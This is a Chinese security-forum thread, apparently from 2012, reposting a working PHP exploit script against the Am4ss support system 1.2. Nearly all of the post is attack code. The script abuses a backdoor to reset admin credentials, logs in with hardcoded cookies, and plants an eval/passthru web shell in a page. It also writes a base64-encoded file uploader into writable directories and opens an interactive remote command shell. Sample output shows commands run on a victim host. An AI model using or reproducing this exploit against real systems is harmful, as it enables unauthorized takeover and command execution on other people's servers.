查看: 10120|回复: 1

am4ss支持系统1.2 PHP代码注入利用

[复制链接]
  • TA的每日心情
    开心
    2022-4-13 14:02
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2012-8-4 12:36:41 | 显示全部楼层 |阅读模式
    本帖最后由 上帝是只猪 于 2012-8-4 12:37 编辑
    1. <?
    2. /*
    3. + Title : Am4ss <= 1.2 , PHP Code Injection
    4. | Download : am4ss.com
    5. | Tested on: Windows xp sp3 , CentOs
    6. | Author : Faris , aka i-Hmx
    7. Time line :
    8. > 10/2011 , Vulnerability discovered
    9. > till now , i haven't reported the vendor , why!!!
    10.    The idiot backdoored it by himself + the official site is fucked up ;)
    11. > 19/07/2012 , Public Disclosured
    12.   
    13. C:\lab>php am4ss.php localhost /lab/am4ss/
    14. +---------------------------------------+
    15. |      Am4SS , PHP Code Injection       |
    16. |         Exploited By i-Hmx            |
    17. |                                       |
    18. +---------------------------------------+
    19. | Testing Authentication
    20. | Injecting our Evil php code
    21. | Searching for Injected PageID
    22.      => 0
    23.      => 1
    24.      => 2
    25.      => 3
    26.      => 4
    27.      => 5
    28. | Injected ID is 5
    29. | I Have wrriten Tiny uploader at :
    30.    + localhost/lab/am4ss//am4ss_cache/fa.php
    31.    + localhost/lab/am4ss//templates/fa.php
    32. | sec4ever shell online ;)
    33. [url=mailto:i-Hmx@localhost]i-Hmx@localhost[/url]# net user
    34. User accounts for \\
    35. -------------------------------------------------------------------------------
    36. Administrator            ASPNET                   Guest
    37. HelpAssistant            IUSR_PHOENIX-XP          IWAM_PHOENIX-XP
    38. PhoeniX                  PhoeniX.Limited          SUPPORT_388945a0
    39. The command completed with one or more errors.
    40.   
    41. [url=mailto:i-Hmx@localhost]i-Hmx@localhost[/url]# exit
    42. */
    43. if(!$argv[2])
    44. {
    45. echo "\n+ usage : php ".$argv[0]." [Target without http://] /path/\nex : php ".$argv[0]." site.com /support/\n";
    46. exit();
    47. }
    48. session_start();
    49. echo "\n+---------------------------------------+\n";
    50. echo "|      Am4SS , PHP Code Injection       |\n";
    51. echo "|         Exploited By i-Hmx            |\n";
    52. echo "|          [url=mailto:n0p1337@gmail.com]n0p1337@gmail.com[/url]            |\n";
    53. echo "|       sec4ever.com , 1337s.cc         |\n";
    54. echo "+---------------------------------------+\n";
    55. $host=$argv[1];
    56. $_SESSION['host']=$host;
    57. $path=$argv[2];
    58. $vic=$host.$path;
    59. function kastr($string, $start, $end){
    60.   $string = " ".$string;
    61.   $ini = strpos($string,$start);
    62.   if ($ini == 0) return "";
    63.   $ini += strlen($start);
    64.   $len = strpos($string,$end,$ini) - $ini;
    65.   return substr($string,$ini,$len);
    66. }
    67. function get($url,$post,$cookies){
    68. $curl=curl_init();
    69. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
    70. curl_setopt($curl,CURLOPT_URL,"[url=http://]http://".$url[/url]);
    71. curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
    72. curl_setopt($curl,CURLOPT_COOKIE,$cookies);
    73. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
    74. curl_setopt($curl,CURLOPT_TIMEOUT,20);
    75. $exec=curl_exec($curl);
    76. curl_close($curl);
    77. return $exec;
    78. }
    79. /*
    80. Enabling the Dirty Backdoor
    81. */
    82. $ok=kastr($vic,"[url=http://]http://","//[/url]");
    83. if (!eregi($host,urlencode(get($vic."/libs/internals/core.assign_by_ref.php?password=ef211a58a6a04914923a7bf23a9a7f0c&username=%C7%E1%D4%D1%DE%C7%E6%ED&country=%C7%E1%E3%DB%D1%C8",'',''))))
    84. {
    85. die("+ Exploitation Failed :(");
    86. }
    87. /*
    88. authenticating using the updated admin data
    89. */
    90. echo "| Testing Authentication\n";
    91. if(!eregi('<td class="tfoot" align="middle" colSpan="2">',get($vic."/admincp/settings.php","",'Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c')))
    92. {
    93. /*
    94. login may failed due to bad connection , admincp path error , admin firewall .  .  . etc
    95. any way u can use the following data to login manually
    96. */
    97. echo "| Authentication Failed\n| Try to login manually using :\n   + User : [url=mailto:alert@am4ss.com]alert@am4ss.com[/url]\n   + Password : kawkawa\n   | auth cookies : \n   + Am4sS_CPCHERKAOUI_UserEmail : [url=mailto:alert@am4ss.com]alert@am4ss.com[/url]\n   + Am4sS_CPCHERKAOUI_PassWord  : ef211a58a6a04914923a7bf23a9a7f0c \n+ Exiting \n";
    98. die();
    99. }
    100. /*
    101. Creating new page to inject our evil php code
    102. */
    103. $facode='echo "<pre>Faris on the mic ;)<br>";@eval(base64_decode($_REQUEST[fa]));echo "faris>>>";passthru(base64_decode($_SERVER[HTTP_CMD]));echo "<<<faris";';
    104. echo "| Injecting our Evil php code\n";
    105. get($vic."/admincp/pages.php?do=add",'do=save&title=farsawy&codetype=2&code='.$facode.'','Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c');
    106. echo "| Searching for Injected PageID\n";
    107. /*
    108. Trying to get the ijected pageid via testing 100 pages
    109. i don't think it will exceed 10 pages after all :)
    110. if this failed , retry exploitation and it will work as hell
    111. */
    112. for($f=0;$f<100;$f++)
    113. {
    114. $mypage=get($vic."/pages.php?pageid=$f","","");
    115. echo "     => $f\n";
    116. if(eregi(">>>",$mypage))
    117. {
    118. $_SESSION['id']=$f;
    119. break;
    120. }
    121. }
    122. $myid=$_SESSION['id'];
    123. echo "| Injected ID is $myid\n";
    124. /*
    125. Injecting tinni file uploader at the cache and the templates directories
    126. these usually chmoded to 777 by the admin
    127. */
    128. get($vic."pages.php?pageid=$myid&fa=JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmID0gZm9wZW4oImFtNHNzX2NhY2hlL2ZhLnBocCIsInciKTsKJHQgPSBmb3BlbigidGVtcGxhdGVzL2ZhLnBocCIsInciKTsKZndyaXRlKCRmLCRjb2RlKTsKZndyaXRlKCR0LCRjb2RlKTs=","","");
    129. echo "| I Have wrriten Tiny uploader at :\n   + $vic/am4ss_cache/fa.php\n   + $vic/templates/fa.php\n";
    130. /*
    131. printing sec4ever1337s via passthru()
    132. to check if it's enabled or not
    133. */
    134. if (!eregi("sec4ever1337s",get($vic."/pages.php?pageid=$f&fa=cGFzc3RocnUoJ2VjaG8gc2VjNGV2ZXIxMzM3cycpOw==","","")))
    135. {
    136. echo "| passthru is disabled \n";
    137. echo "| You can evaluate Your code at:\n    $vic/pages.php?pageid=$myid&fa=base64_encode(eval code)\n";
    138. exit('+ Exiting');
    139. }
    140. echo "| sec4ever shell online ;)\n";
    141. /*
    142. if passthru() is enabled , then get small command executer
    143. using Egix fsock method to send and retrieve data
    144. */
    145. function http_send($host, $packet)
    146. {
    147. $sock = fsockopen($host, 80);
    148. fputs($sock, $packet);
    149. return stream_get_contents($sock);
    150. }
    151. $packet  = "GET /{$path}/pages.php?pageid=$myid HTTP/1.0\r\n";
    152. $packet .= "Host: {$host}\r\n";
    153. $packet .= "Cmd: %s\r\n";
    154. $packet .= "Connection: close\r\n\r\n";
    155. while(1)
    156. {
    157. print "\ni-Hmx@".$_SESSION['host']."# ";
    158. if (($fa = trim(fgets(STDIN))) == "exit") exit("\n+ Exiting");
    159. $response = http_send($host, sprintf($packet, base64_encode($fa)));
    160. $final=kastr($response,"faris>>>","<<<faris");
    161. echo $final;
    162. }
    163. /*
    164. woooooow , that really fucked my mind
    165. But it was funny :D
    166. Greets to all sec4ever members
    167. C u Guys in another Bomb ;)
    168. */
    169. ?>

    复制代码

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2015-9-12 11:20
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-8-4 15:37:48 | 显示全部楼层
    没看懂 给点说明嘛
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-28 11:31 , Processed in 0.027635 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部